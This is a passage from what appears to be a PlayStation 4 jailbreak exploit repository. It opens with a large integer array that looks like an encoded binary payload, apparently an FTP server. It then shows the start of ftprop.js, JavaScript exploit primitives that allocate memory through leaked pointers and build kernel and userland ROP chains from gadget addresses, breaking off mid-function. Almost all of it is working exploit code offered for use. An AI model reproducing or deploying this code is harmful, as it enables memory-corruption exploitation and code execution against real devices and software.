998783,1227721544,1207959599,601898381,369033216,12380,823163787,3263776969,3409284424,4278190115,3296938197,3277675288,1398101057,1224444232,1212214403,74487693,2370306048,2344501,2139965440,4290785620,3102485,1888717568,1207959556,599209357,2303197184,4290785767,3127061,629885952,12000,4293364040,3143445,276531968,837192008,3263776969,1221918529,1530971267,3277603165,2303218517,2370326779,2329917,764102656,11948,801510911,2072707072,1221144848,2370355849,2322741,1221984000,781069707,2370306048,2323005,2702573312,2332033071,3375435899,1220708680,593311117,3590258688,1764592456,1207959598,593182093,369033216,12156,823163787,1213743561,1213973129,1214113929,591345037,3774808064,4220078163,2436730184,4278190128,3099413,2475378688,1128,1959953736,2206943246,1120,1619167560,1207959556,73433995,2236088320,1208448192,73961609,994574336,3170077,1208448256,810943881,234815488,12376,1094552904,1526726704,778708479,1447100416,1413567809,2303218517,3968026875,1032669200,8911,3308096328,1224736813,369091977,11996,823163787,3263776969,2956299592,4278190114,1804421333,3136696660,512,4293888328,3020565,276531968,12241201,1207959554,369094281,11836,1133101189,4035841872,1275068416,2370366089,2228021,4018751488,369082417,11708,8382,4018751488,780015103,2236088320,1208841664,39355335,0,183173120,1220607816,39355273,3904831488,1275068419,723395981,369033216,11784,607423305,1962313032,1821067549,2236090404,1276343533,2202660745,369037508,11704,3698704517,2370586091,3115813,1307390208,2202134153,1057916,2336826484,2303468596,2434138095,2231369773,1209234880,1799941475,2336823533,1208495724,259386757,3321829355,415531849,1964047747,1208675273,3590315913,4294904041,764102911,11436,3258813768,4278190113,2998037,276531968,2303248689,898451650,8621,3739866623,1040187390,2151743748,2303199348,4265011423,2072772607,3776315152,2197815340,1946163323,343640856,751965695,2072182784,158663192,4282153867,2933525,3750316032,764548607,4281401344,743052799,2202533888,3224441028,1547787611,1581342017,1096237507,1096106326,1213420884,10022017,3375431680,442,179712,2370306048,2184509,1821198336,369045540,11212,405030087,1,608996680,79184152,3120562176,4,16777150,2311555328,3033861,1686981632,369040420,11324,539247814,3338613008,35726404,611093836,3977641792,251658283,774782391,2370568192,1149830261,369042468,11168,772685195,2370306048,1713382516,572802185,4282,1427504896,2332033068,3011389,8437248,369033216,11380,472138951,16,769277323,2303459328,4001974498,747771391,3229941760,264735041,72328,1095936,2303459328,4136193258,703,18218752,3204448299,1144,720246271,2370306048,2131765,3280553984,764282251,2302935040,1137119355,24,3146598400,608,369034121,10884,1081838920,4282,4001974272,715265535,2370306048,2968381,85327616,1207959596,759563659,2236088320,1210021312,758783369,3343384576,288899,0,2210875392,1120,0,2303205611,286851,495536128,11540,1754827080,1207959556,73958343,0,2210856960,1136,0,3913125192,4278190124,2945797,219545344,1275068459,1344554125,753014155,2303459328,898451655,8138,608471372,4290785544,2831125,1149979648,2370308132,2303199355,361580761,4294966382,369096241,11088,749340159,3253272576,1224736766,10011777,3224436736,1547787611,1581342017,1438867265,3968026707,411009816,4220078081,355306312,1207959594,724436363,2303197184,1955154167,125110308,2072760575,4278577940,1014729680,611617608,3296937992,3263776792,3901311067,4291375453,2303218656,3968026875,411009808,343902977,2370310517,280632435,4278190080,2792213,3340430080,269231172,1207959552,203707533,745770312,718935551,1133051904,3296938044,1103321872,1431585109,4220078163,3145945665,1136,4152969217,131002,2180389120,260326,180781312,3892314114,4294964494,2282733701,242,736509323,2302738432,353763268,1207959593,2303246469,1210611141,515849613,2336751616,2705197,1628831488,2332033066,3375435899,1220708680,514012557,3605594112,1207959552,1122557833,1224736767,514866573,2337013760,2692909,823525120,2332033066,3375435899,1220708680,513029517,4282449920,410747861,1964346113,1207959595,698746251,91553792,3943988107,1014729475,2303248689,2245066734,2299491520,4001974466,3907488068,4294964314,2302987243,4100516071,2303262719,18218991,3338666026,290947,0,764102656,10408,1530760520,4278190110,2734869,276531968,2303248689,898451650,7750,1497486847,1541376328,1096565085,4160022877,2370371583,1984317,764102656,10348,696653311,2072707072,1221144848,2370355849,1977141,1213743360,1566304393,1564564545,1430380799,1413599793,2303218517,1213350395,4130469769,4294168040,264275455,66184,1890814720,822083588,1103595986,736674953,2348810228,2790205,3306553088,1207959591,2303246469,1210611141,493829517,2336751616,2619181,286654208,2332033065,3375435899,1220708680,491992461,3622371328,1207959552,4075347849,1224736765,492846477,2337013760,2606893,3776315136,2332033064,3375435899,1220708680,491009421,4282449920,689277909,1207959594,2302996105,4079020263,3230007295,2072191348,3263758616,2365950796,1962934311,343640837,2072708075,1221144892,4282510985,1154149328,401139593,1224736755,369094537,10416,74482631,0,2336751616,2578221,1032669184,7434,678041087,2072707072,1221144848,2370355849,1897781,1104543488,3750316121,1547787611,2749979969,1224736758,485899661,2336751616,2562861,890633984,2332033064,3375435899,1220708680,484062605,1480654848,1541966152,1096565085,1407254365,4294674760,2625301,3372173312,2303201653,2370329567,1849141,1361444608,3187671078,47,4292839752,2536213,3275311104,13032564,1438866176,4220078163,3213707344,608,4294948584,764102911,9896,2336066888,4278190108,2603797,276531968,1480706353,1539475784,1575520584,1865780552,4278190108,1431585248,4220078163,283935048,1207959554,39370635,2236088320,1210611199,441925005,2336751616,2513709,1964375808,2332033063,3375435899,1220708680,440087949,1474887680,1207959553,270822541,2303246385,898451690,7214,646059519,3229941760,2370354558,1799989,4018751488,650515967,3229941760,2370310005,155835,4001974272,61673,898451456,7170,4293888328,2532117,1975551232,3146598417,608,4294896360,13756927,2088763392,1278152740,270836877,1962934273,4001974286,4293364044,2439957,1213524736,39881613,2370306048,1772341,3481880576,608995656,1427504904,1224736806,2337073289,2433805,1220576512,136596619,2370310517,1807381,16825856,2303459328,1209134055,461903245,12451840,1275068417,3224496009,1221721921,448673165,2303459328,219545575,2231369766,826045632,1291203026,3890800521,2248146928,1210415552,458636685,2336751616,2439981,1427504896,2332033062,3375435899,1220708680,456799629,988479488,3286812553,1224736752,39893901,2303459328,2232811494,1207959588,456342925,2336751616,2424621,420871936,2332033062,3375435899,1220708680,454505869,3590258688,281313608,1526726658,3277603165,1398101057,1224444232,17886337,2336751616,153791,4286924800,2336761717,2407213,1032669184,6313,634263039,2072707072,1221144848,2370355849,1610805,3956670208,1150110815,3224440868,1240828232,2303513737,1275601988,2370355849,1735989,3507879680,2231369764,2159247040,789587068,608471884,1276212488,2303517321,4018751686,614602239,485163008,1619758408,1207959554,441980301,2303459328,4018751718,369082417,9156,281313608,1526726657,3277603165,2169000789,67820,1887946496,4278190084,1224736767,2303261577,16825062,837287936,1224736767,2303256201,4200720607,2169044991,67780,3277675264,2169000789,67820,4220078080,3135670600,256,4294902760,3867756799,3906963784,4294965811,147095880,1526726657,1398129501,149717320,1207959553,12254089,1207959553,3588810377,1224736766,56671117,2303197184,4017678566,3230007295,2370315641,1700157,764102656,9104,615126527,2072707072,1221144848,2370355849,1692981,1221984000,594685323,2370306048,1696829,2232811264,2332033060,3375435899,1220708680,433010061,3590258688,147095880,1526726657,1398129501,149717320,3120562177,256,1223067976,1441332617,1224736766,1390995337,2248146922,1210873024,2370365321,1682485,3989235712,2303262719,898451695,6557,4294622696,1032669439,6545,4293832168,1208740863,2303256201,4205111535,2169044991,67780,3277675264,2169000789,67820,16824832,2303197184,4220078310,4294832104,3884534015,4293817832,764102911,8892,2336800901,2347781,1209694208,424361357,3506372608,823163787,3263776969,976588104,3942645785,1032669208,6469,2072760575,1221144848,2370355849,1651765,1221984000,17351809,1566244864,1431585219,16824915,2168979456,114924,4253632512,614239560,192,3906898248,4294966644,611618120,3750316104,4293803496,2042660351,495667239,8760,121474376,4278190105,2312981,276663040,2303248689,898451650,6386,1038865407,610045256,2492155912,36900,898451456,6392,836733256,3373662144,1207959586,2337070985,2223909,152436480,2332033059,3375435901,1220708680,4282506889,3296807124,448,1547787611,1213420995,17362049,12189696,1207959553,2303256201,4242204923,4290707455,1207959553,2347296649,1224736749,564276619,3229941760,3104148296,2013265954,1032669210,6287,2072760575,1221144848,2370355849,1605173,1209592576,411975053,3506372608,823163787,3263776969,2100661576,4278190104,3296807125,264,1438866779,3967895635,264,65722,3867756544,3908798792,4294966372,3907488072,4294962470,628670597,1799195976,1207959576,556150155,369033216,8768,823163787,3263776969,1328909640,3942645784,4290785613,2174741,764102656,8448,1212299395,571868555,443875328,1144884552,4278190104,276532176,2303248689,898451650,6195,2370312427,1591357,2345729792,3375435899,1220708680,406271373,3590258688,147095880,1526726657,1463927645,1430345281,1398101057,1223459144,1207959557,2303262089,1209541748,3357842573,1207959552,405044363,3906898248,4294962306,561561733,539264139,822083585,2089502930,4130412580,740574345,4293658088,2311095807,2032673860,1032669224,5744,1427999560,4278190112,2191125,276663040,2303248689,898451650,5716,355561,608471808,3347662892,608471368,3776315152,1207959583,270816395,2303260209,76105927,2501246756,1275068448,537798027,2370306048,1548861,555089664,2332033057,3375435901,1220708680,395130253,4282449920,4018751700,610569548,4127189112,2303524863,2031484903,1207959584,2753868941,1275068416,369092489,8328,612666696,320,610044232,1149847624,2370314276,8397956,2303197184,1214260292,1914979469,608471368,609520392,881543212,612141860,3952404520,3230007295,75075087,2554855424,604242760,606374732,608471368,1681607760,2215596068,1097,612139073,2215575560,1071,608472393,1284196360,2336757796,1226843260,2303246473,1211114564,357569933,12451840,822083585,3172335552,1207959582,1210348683,612141896,3944802336,3230007295,65897743,2223702016,53284,2450944,4024048,1211069856,539262091,615812424,576,65722,3938510848,3230007295,2554858622,1074037958,2,2227570923,147492,2336751616,1162355780,2336812337,1214260340,4281890957,2066197,614238976,208,1725860161,15106369,2168547056,1973420286,616333332,576,2223851520,147492,1158630400,2223720680,69668,613190400,148,3089402937,1140850688,2418326667,1207959552,941900937,2351203467,1275068416,502402443,1149829120,662005796,612666180,132,555060552,2332033046,8922252,113115136,1207959552,136608907,4282499121,1209854929,136608907,124567937,2370306048,1442069,441856,3224436736,1221721921,497157515,1097203712,2684419713,608471368,1091269952,32128,25068815,2302935040,834040,4153999360,93145337,5920,1208075254,2370359907,2303234052,1951933508,3677439252,4269883750,255934464,2370290581,3950222172,2168546837,3091202302,45,5487425,256114688,3632912453,1711464579,2298607747,3373876696,1090838659,1102504323,1719124355,419559555,3152184274,4134716035,343148739,1725051205,16679233,2500804928,1418545090,367752082,4269883750,767049728,1090519040,21434,1158628352,2212006352,2204504288,3632857592,2214533445,2202083552,2202121959,2204530631,423952888,3850584557,3313713595,1086584434,4130411124,4269883750,255868928,1955448469,334197686,4269883750,767049728,3187671040,83,2314224911,4223078360,8398182,1814320265,33063782,424007817,2451190,3867361537,3330490806,4169361015,3222881537,3152053057,1925219137,4293688040,3163375871,213028,611647232,3367898928,270824703,2015642763,611647312,611647344,1095975256,613714769,164,837912901,1380012736,1430345537,2626373718,40996,361580544,5231,131262,1221852928,3915433091,304,3120073028,12,4223078297,2370370039,1416965,3529721856,2416217416,608471368,2212006232,2204500448,3632857592,3766733081,3051455234,1719189891,419559555,2212006354,3766728418,2009236228,33063782,2315196741,3884138968,148931515,1925677889,33063782,2314606917,3867361752,283149237,2026275649,33063782,2312837445,3817030104,551584694,2009301825,33063782,2312247621,3800252888,1088455611,1925350209,33063782,3632920089,1723197059,2197848101,2204530886,423952888,1104710089,1723261315,1090584613,1719124355,1157757059,1418313753,2202102820,2202123232,1290302144,1224736747,1076149389,1375731715,1962890561,1962885156,2492145700,34852,3233681152,615841618,128,1747219711,613714769,172,3224486281,1096237394,1095975254,2336773714,11543708,2370306048,1273109,33603072,3556704256,1891926856,614239560,832,1223657800,417914505,3137339377,512,2303260209,2971008991,1090519067,608483087,3288418564,4294683881,1418414335,4130410532,607947592,462558719,1860763648,2348810235,3894944892,4294960810,607947592,474093055,2303197184,3933006063,2370371583,1258045,495667200,6884,469636607,2106261504,1221144848,2370355849,1250869,1221852928,88654977,1566244864,1564564545,1598119489,1213420995,25750657,2303197184,3213576443,600,1962902856,2894940210,32804,1220555008,2370366089,1084725,3776315136,2231369754,1209302720,136606861,3908012360,4294960754,2247002440,1208449472,39891853,2303197184,4188858591,2169044991,100548,3277675264,2169000789,100588,16824832,2370306048,8397996,2303197184,4001974523,4294269928,1955416319,2303199268,3861178607,3230007295,2370315641,1111357,764102656,6680,456267263,2072707072,1221144848,2370355849,1104181,1211362048,2370367113,221371,1763049216,1207959577,306855309,2336751616,1696557,4246077184,2332033050,3375435899,1220708680,305018253,3590258688,2294579528,1526726657,2337522525,1851165,266044672,34181,1223723264,472257933,2303197184,486918142,28,3204464640,2,151357798,4278190108,1665813,361580544,4620,2370369073,1823549,2501246720,822083609,361580736,7180,132295,1207959552,1209581699,98365,1290171648,301073805,3375431680,370511176,838860781,1032669430,7088,440538623,96927744,7092,1,3414361067,1540917759,2755494851,27,13927439,1032519680,7040,4130427969,369054549,6728,460209547,369033216,6508,1698532168,822083611,3709206518,1207959577,457063821,369033216,6648,958237512,1207959579,1366612869,3188751243,1,1621855048,1275068420,4278739851,1702677,410747648,2334290944,62788731,4278190080,1697557,410747648,2332980482,62798971,4278190080,1692437,1291202816,2303256457,1964376043,3942645785,1032669354,6868,419304959,2336751616,1754941,3642097408,1526726679,3171272520,26,1560281088,448398791,0,96927744,6860,0,1220762689,449713549,3224436736,2211547464,1962938490,1217939485,1209581675,2303248385,1888045112,272680712,1,440,3237987072,415400776,1964046467,3284152786,2202555221,2336757996,1571613,4253632512,611617096,4152969224,420091391,2106261504,1221144848,136606859,415531848,1220708680,1566300297,4058636543,1224736754,391525773,1213333504,287194509,3343384576,1563397,0,130803712,3229941760,2370316916,1520437,1032669184,4363,505064,1958774016,898451475,5916,121474376,3892314129,1949,386547083,2370306048,1547029,898451456,4353,489704,4047342336,1207959574,395974029,2370306048,1110069,123725824,1032519680,5848,3776286024,1207959574,284177805,1189609472,2332033031,1490749,361580544,6152,898451544,4325,470249,826626816,3224454601,3526478129,2370369073,1104957,1091960576,1207959575,380769677,2370306048,1105973,2311293184,117172423,3750297600,689278280,1207959576,281949581,3873964032,2298478598,361580767,5964,3191180616,3892314128,1745,2370363273,1509141,898451456,4272,441576,1222609152,373953933,2370306048,1090357,111667200,3750297600,1024822600,1207959575,278214029,2464677888,2298478598,361580767,5808,2268433736,3892314128,1661,2370363273,1520405,898451456,4218,420072,1222609152,366351757,2370306048,1076533,106162176,3750297600,2434108744,1207959574,274806157,1055391744,2298478598,361580767,5692,1396018504,3892314128,1577,2370363273,1519381,898451456,4165,398568,1222609152,388109709,2370306048,1062709,100657152,3750297600,756387144,1207959574,271136141,3941072896,2298478597,361580767,5448,473271624,3892314128,1493,2370363273,1418005,898451456,4110,377064,1222609152,354817421,2370306048,1048885,95152128,3750297600,2702544200,1207959574,267728269,2531786752,2298478597,361580767,5660,3845492040,3892314127,1409,2370363273,1451797,898451456,4053,355560,1222609152,368711053,2370306048,1034549,89647104,3750297600,219516232,1207959573,263992717,1122500608,2298478597,361580767,5728,2939522376,3892314127,1325,2370363273,1411861,898451456,4003,334056,1222609152,358487437,2370306048,1020981,84142080,3750297600,3910503752,1207959573,260388237,4008181760,2298478596,361580767,5476,1999998280,3892314127,1241,2370363273,1363733,898451456,3944,312552,1541376256,1091931464,1207959573,257439117,2934505472,1207959556,3104327563,3221225602,1077971788,1212713804,2303209999,2425047505,280,551665992,1221069128,1781575821,3342991311,1088,3342925824,2112,2202533888,3342991305,5184,46596096,0,2962656072,1224803225,1211125897,4197488267,2303263258,2303270993,2336757841,77975,331302912,0,1211629824,1214270089,1213758089,258493065,2303246880,3783346385,4294901759,2160140815,3067119246,2261193729,5075191,0,3500772992,2147680694,3067128462,2390753537,28758216,2173093633,19839,3321888768,3819315840,2160496895,4293109283,1048626921,2432689064,2822734022,261160931,3224486434,898451651,3693,4221757520,96993279,5616,0,1398129498,149717320,1207959553,2303261577,16825062,3018326016,1224736763,12248713,1207959553,348536205,369033216,5048,1222609224,197539213,1508376576,1224736763,17351809,1566244864,1096106435,1213420884,76082305,12189696,1207959553,2149883021,1207959553,2303262089,2760723678,33060,4216907776,4130471935,3906963784,4294958814,3976564040,1207959565,136594631,7,604277064,3758460232,1207959565,270812297,3674574152,1207959565,405030087,7,1222609224,539247753,608487240,1832,1552500736,369045540,5108,608487240,1864,3237955584,608471368,93145144,3493,608471368,93145152,5120,608471368,3347662928,331486719,3526426624,2238,3237955584,1223133512,1478771849,2030406984,1207959565,1612989577,608487240,1896,1686719488,3343413284,4286063684,3892314112,4294958726,2486537544,2231369741,1281259968,2370365321,41952412,369033216,4972,3442314060,1207959569,2336800901,1205013,1946202112,1305673501,2370363529,860693,3188230912,512,836733256,3590275520,3539933419,672501064,3187671053,512,2303199371,1103114719,2303251967,4018751710,4294569960,3296807167,1160,1547787611,1103322433,3126023508,256,15499592,1207959555,2303261577,4194101478,4130471935,3907488072,4294958466,590712136,2231369741,1277917632,310519179,3224436736,298980863,2370306048,16786604,2370306048,844597,1209043712,3224498057,1221918529,2303258249,4185843935,2169044991,196804,1096637184,1413595996,2303284053,3967895804,256,285087231,3229941760,3364029817,1210969087,247457417,4278190080,1113877,2311095552,3135731907,16,1290176840,369092489,4320,303699455,3632857088,12878152,1526726657,3277603165,2202555221,2303219948,1627768827,16777235,3892314112,4294965567,4294569192,20572415,3873964032,1207959554,2370361993,4294727221,770047,3224436736,229864,61532160,2370306048,809021,3620464640,2303262719,4283754727,3230007295,2370310521,808509,3618891776,2649358335,3187671040,1337,3907488072,4294964970,3996486984,1224736764,206192013,1424490496,1224736760,4243862925,2370371583,802877,4165068800,2370371583,4294780981,1032669439,3122,4294455016,1821198591,2370310180,4294868533,1032669439,3103,4294448872,4018751743,342457,3800647680,204836168,822083596,286654400,1207959569,787017609,2214592471,1212989,225705984,1280191,85327616,3942645777,3904909802,4294964981,4148006216,3892314123,4294956805,1489273672,1566294065,3234285763,477,170217,3234285568,73,167145,3234285568,591,164073,4052305920,1221734736,826670729,38977472,3224436736,157160,1405311488,1170813253,3375480881,4130460209,2621279560,4278190091,1044245,361580544,3952,2536869192,2298478603,3905391043,4294967209,2370363273,1048341,898451456,2955,4294939880,1222609407,273814925,2370306048,755765,4286572544,3750363135,1695911240,1207959567,193017229,1793589248,2315255807,361580767,4224,1999998280,3892314123,4294967125,2370363273,1049365,898451456,2927,4294918376,1222609407,270407053,2370306048,746805,4281067520,3750363135,3373632840,1207959567,190657933,384303104,2315255807,361580767,4156,1396018504,3892314123,4294967041,2370363273,972565,898451456,2896,4294896872,1222609407,255464845,2370306048,740661,4275562496,3750363135,2098564424,1207959566,189347213,3269984256,2315255806,361580767,3720,1127583048,3892314123,4294966957,2370363273,967445,898451456,2877,4294875368,1222609407,242619789,2370306048,734261,4270057472,826671103,3224454601,3526478129,2370369073,731197,2568355584,1207959566,233444749,2370306048,730677,2311293184,4266911943,3750363135,555060552,1207959567,186332557,1055391744,2315255806,2370329567,906005,898451456,2835,4294846697,1032540415,3488,286625096,1207959567,185218445,250085376,2348810238,886589,361580544,3576,37064008,3892314123,4294966773,225328523,2370306048,968469,898451456,2808,4294827240,1430096895,1207959565,232658317,2370306048,716341,4257474560,1032585215,3388,353733960,1207959565,183055757,2867331072,2348810237,860989,361580544,3748,3879046472,3892314122,4294966673,218774923,2370306048,916245,2370328832,713013,4252494080,826867711,3397994944,24249615,1032014019,3451,1343779840,225580543,2304311296,3234285576,4294967295,4290955080,3288334335,827377969,1224094162,179715469,826605568,3224454601,224269823,1213792256,216929677,2370306048,704821,3922168064,4294966553,0,0,0,0,0,0,168456997,168430090,1651965962,808464896,544165408,1919250543,1869182049,691740782,855640589,1428173107,1852990835,543518049,539773775,1684366702,1935765536,1919907699,811737188,221148019,858914826,1934958640,1814065765,1701275503,1852383332,658721,540095026,1685024583,543521122,1886283123,975202657,168634407,892416512,1229870368,2035556440,540697968,168638540,1347700224,1667183699,1852139884,1764056948,1952539743,1869832033,1952803683,926036480,1953383712,1852404325,1632641127,1986622323,1867325541,673211748,1969776677,1751655724,1747266677,623670632,745891944,1969776677,1751655724,168634741,808465664,1853444896,544760180,1869771365,1663052914,1634561391,1965057134,1667592814,1768843119,778331514,620759565,745891944,1969776677,1751655724,1747266677,623670632,745891944,1969776677,778315008,623797285,1680158308,808464896,1380929568,1868767316,1851878765,1970479204,1936024419,1819633267,658721,540489010,577971490,544434464,543516788,1920103779,544501349,1701996900,1919906915,168636025,543368448,838890277,1327509552,226058603,808779786,1917132852,980578162,1684103712,1918988320,1952804193,1064530533,620759565,543054634,1680154717,808792832,1936020000,1852403061,1952522343,224666912,825360394,2019896625,1936614772,1936617321,1375734285,542397253,1163023443,168643905,825307648,1684956448,838863373,1176514610,877875284,1919243040,544367990,1684104562,168636025,842020096,1919898400,539785586,1835888483,543452769,544501614,1819307369,1852140901,778331508,220740128,1413873674,1597264720,1987208563,1935635045,7037807,1413873711,1597264720,1701407843,627012718,1752457065,1684104562,808793344,1970225952,1847616620,1629516911,1668246636,543519841,1869440365,221149554,892403722,1884233776,1852403301,1833508967,543516513,1701080941,1952539680,1920213089,1718840929,221147749,842137610,1918115894,1718840929,1663070821,1819307375,1684370533,658734,540030261,1701603654,1953459744,1970234912,221144174,808583178,1866670128,1851878765,1802444900,221149537,1529151498,151653726,774766685,628303104,1931804787,7546159,540030261,1635151433,543451500,1701996900,1919906915,168636025,808792576,1902465568,1953719669,1713398885,543517801,1769235297,1864396399,746152299,1836016416,1952803952,221144165,892665866,1917132848,544370546,1634624882,1735289197,1701344288,1818846752,168636005,909259264,1852133920,543518049,1886220131,1702126956,168636004,1937059584,1949266533,779119973,1718379891,909259264,1818838560,1701060709,1702126956,168636004,808793344,1970225952,1847616620,1679848559,1952803941,1752440933,1768300645,221144428,892665866,1750343728,1768300645,1679844716,1853056367,1696625703,1953720696,658734,540225842,1684827173,838863373,1142961714,1667592809,2037542772,1701995296,1684370529,658734,540030261,1819635523,1869488228,1919098996,1702125925,1701344288,1919509536,1869898597,221149554,842137610,1766072374,1952671090,544830063,1701602660,778331508,889195021,1142960181,1667592809,2037542772,544434464,544501614,1953525093,168636025,808793344,1970225952,1847616620,1679848559,1952803941,1752440933,1768169573,1952671090,779711087,822086157,1327509557,1768842608,1092642670,1229538131,1685024032,1633951845,1948279156,1936613746,544367974,544370534,1414744396,658734,1681010725,842016058,807731300,620782644,627254627,627254627,627254627,627254627,543368547,1936728113,1936728116,1814372404,622884204,841293939,1931812964,225649952,1663369226,1663394597,1663394597,1663394597,1663394597,824206117,879980576,879980576,1819026720,1931812981,1681007904,544417056,757101349,1931812926,838863373,1411397170,1936613746,544367974,1886220131,1702126956,658734,540030259,1701716041,1948279909,1679844712,1769239397,1769234798,1847619183,543518049,1936928866,658734,1397773382,1818451764,1953391977,1936288863,1970102132,7890292,1397773382,1702059828,1919252082,1919448159,6578533,1347374926,1163089152,1095762002,1358975827,5523797,1414748499,1396789248,1330643030,1275090002,5526345,4478800,4478787,1162893652,1430536960,1163001936,1392530004,5394260,1162626372,1145917952,1145785600,1179537920,1313996882,1392529236,4545097,1414743378,1095058944,1346437204,17744,0,0,0,7233866,6448454,7496013,7499841,7954765,7238986,7107914,6780225,7365971,7627599,7761742,6513988,1801611628,1701737061,1886596716,1811970162,1701536361,1818586738,1650816863,1919972142,1768685688,1919249250,1600939374,779319667,2020765811,1700749056,1919906418,1701016320,1852990795,1867279461,1951622241,1299477089,1819632751,1668481125,1919241061,1399612782,1885693292,1701016320,1852990795,1934978149,1885693292,1651076096,1281712979,1231250025,1919251566,778854766,2020765811,1818324224,6516588,1701147238,1835363584,7628147,1818322290,6516588,1668113773,1929410928,1835233908,1953693808,1835232882,1886584944,1953393010,1853030502,1852404336,1929406068,1851876211,1953693798,1920234354,1920234240,7234924,1668445299,1929409128,1668182644,1929410928,1885565556,1953693817,1751347826,1953693810,1920099698,1627419247,6909812,1701669236,1953326848,1600482665,1886322803,1768189541,1701970034,1768186977,1818427506,1684370287,1711305321,1852141679,1701996032,1711301729,1953067639,1952841829,7105637,1701147494,1667629163,1702063980,808464896,1969771296,1852404852,1868832871,774794871,658734,2037674854,1845519728,1718381685,1936064627,1752457584,1918989312,7628135,1836216933,889218931,1126182965,1684829551,1953459744,1970236704,673215598,975791141,779298080,889195021,1126182965,1684829551,1953459744,1970236704,673215598,774464549,838863373,1293955120,1953396079,1668641568,1936942435,658734,540030261,1819635523,1869488228,1853169780,1853189997,623386740,221129060,808583178,1851072560,1853189997,1970479220,1936024419,168636019,1818580736,1701670755,544175136,1397773382,829825076,1426076206,1818386798,1869881445,1952802592,542132512,1919181921,7566181,1414875219,1314344772,1179929856,1414332498,1426083668,1342198861,1814049875,1702130537,1735289198,175009568,622874697,1867522163,622883954,2034368617,1811947877,1666409065,1952796261,1919972142,1668481144,1952796261,1801678675,1929409637,1699636579,1668240244,1131701611,1702063980,1701016320,1131701582,1701736047,1929409635,1699636579,1852134260,1668481124,1952796261,1701012289,1929409648,1699636579,1852392052,1668481124,1952796261,1953720652,1929408101,1699636579,1667584628,1668481142,1952796261,1801678675,1648456805,7631471,1315267443,1699181669,1668248436,1835101803,1668481125,1952796261,1937007955,1869308783,1929409648,1699636579,1701726580,1869893236,1668481136,1952796261,1952804425,1852798032,1701016320,1215587662,1819176820,1701016320,1215587662,1936617332,1651076096,1315267411,1950577765,1886596716,1929410674,1699636579,1819558772,1953066569,1701016320,1131701582,1700031604,1929407858,1699636579,1819558772,1232364871,7300718,1348821875,1701996660,1917019233,1702125925,1701016320,1919448144,1164206437,7629176,1348821875,1701996660,1867146337,1929408105,1951425891,1634038376,1953844580,1850308709,1929409641,1951425891,1634038376,1953844580,1698986085,1869771891,1668481145,1752453221,1684104562,1702131021,1668238456,1668481131,1752453221,1684104562,1702131021,1819170168,7037807,1937339183,795698548,1835888483,1815047791,1815044713,1666409065,1937331045,1818850389,1919972142,1668481144,1937331045,1818850389,1684956499,1953724755,1867410789,1768319348,1769234787,1767337583,1700030580,29816,0,0,0,0,0,639644100,9,639632698,9,639644105,9,639632748,9,639644110,9,639632798,9,639644115,9,639632848,9,639644120,9,639632898,9,639644125,9,639632948,9,639644130,9,639633223,9,639644135,9,639639125,9,639644140,9,639633655,9,639644144,9,639636109,9,639644148,9,639633741,9,639644153,9,639636047,9,639644158,9,639636934,9,639644163,9,639636760,9,639644168,9,639637036,9,639644173,9,639637431,9,639644177,9,639637313,9,639644181,9,639639224,9,639644186,9,639636806,9,639644191,9,639637149,9,639644196,9,639633900,9,639644201,9,639634000,9,639644206,9,639636704,9,0,0,0,0];
2 | 


--------------------------------------------------------------------------------
/PS4Exploit/data/ftprop.js:
--------------------------------------------------------------------------------
  1 | // Basic memory functions
  2 | function malloc(size)
  3 | {
  4 |   var backing = new Uint8Array(0x10000 + size);
  5 | 
  6 |   window.nogc.push(backing);
  7 | 
  8 |   var ptr     = p.read8(p.leakval(backing).add32(0x10));
  9 |   ptr.backing = backing;
 10 | 
 11 |   return ptr;
 12 | }
 13 | 
 14 | function mallocu32(size) {
 15 |   var backing = new Uint8Array(0x10000 + size * 4);
 16 | 
 17 |   window.nogc.push(backing);
 18 | 
 19 |   var ptr     = p.read8(p.leakval(backing).add32(0x10));
 20 |   ptr.backing = new Uint32Array(backing.buffer);
 21 | 
 22 |   return ptr;
 23 | }
 24 | 
 25 | function stringify(str)
 26 | {
 27 |   var bufView = new Uint8Array(str.length + 1);
 28 | 
 29 |   for(var i=0; i < str.length; i++) {
 30 |       bufView[i] = str.charCodeAt(i) & 0xFF;
 31 |   }
 32 | 
 33 |   window.nogc.push(bufView);
 34 |   return p.read8(p.leakval(bufView).add32(0x10));
 35 | }
 36 | 
 37 | // Class for quickly creating a kernel ROP chain
 38 | var krop = function (p, addr) {
 39 |   // Contains base and stack pointer for fake stack (this.stackBase = RBP, this.stackPointer = RSP)
 40 |   this.stackBase    = addr;
 41 |   this.stackPointer = 0;
 42 | 
 43 |   // Push instruction / value onto fake stack
 44 |   this.push = function (val) {
 45 |     p.write8(this.stackBase.add32(this.stackPointer), val);
 46 |     this.stackPointer += 8;
 47 |   };
 48 | 
 49 |   // Write to address with value (helper function)
 50 |   this.write64 = function (addr, val) {
 51 |     this.push(window.gadgets["pop rdi"]);
 52 |     this.push(addr);
 53 |     this.push(window.gadgets["pop rax"]);
 54 |     this.push(val);
 55 |     this.push(window.gadgets["mov [rdi], rax"]);
 56 |   }
 57 | 
 58 |   // Return krop object
 59 |   return this;
 60 | };
 61 | 
 62 | // Class for quickly creating and managing a ROP chain
 63 | window.rop = function() {
 64 |   this.stack        = new Uint32Array(0x10000);
 65 |   this.stackBase    = p.read8(p.leakval(this.stack).add32(0x10));
 66 |   this.count        = 0;
 67 | 
 68 |   this.clear = function() {
 69 |     this.count   = 0;
 70 |     this.runtime = undefined;
 71 | 
 72 |     for(var i = 0; i < 0xFF0 / 2; i++)
 73 |     {
 74 |       p.write8(this.stackBase.add32(i*8), 0);
 75 |     }
 76 |   };
 77 | 
 78 |   this.pushSymbolic = function() {
 79 |     this.count++;
 80 |     return this.count-1;
 81 |   }
 82 | 
 83 |   this.finalizeSymbolic = function(idx, val) {
 84 |     p.write8(this.stackBase.add32(idx * 8), val);
 85 |   }
 86 | 
 87 |   this.push = function(val) {
 88 |     this.finalizeSymbolic(this.pushSymbolic(), val);
 89 |   }
 90 | 
 91 |   this.push_write8 = function(where, what)
 92 |   {
 93 |       this.push(gadgets["pop rdi"]); // pop rdi
 94 |       this.push(where); // where
 95 |       this.push(gadgets["pop rsi"]); // pop rsi
 96 |       this.push(what); // what
 97 |       this.push(gadgets["mov [rdi], rsi"]); // perform write
 98 |   }
 99 | 
100 |   this.fcall = function (rip, rdi, rsi, rdx, rcx, r8, r9)
101 |   {
102 |     if (rdi != undefined) {
103 |       this.push(gadgets["pop rdi"]); // pop rdi
104 |       this.push(rdi); // what
105 |     }
106 |     if (rsi != undefined) {
107 |       this.push(gadgets["pop rsi"]); // pop rsi
108 |       this.push(rsi); // what
109 |     }
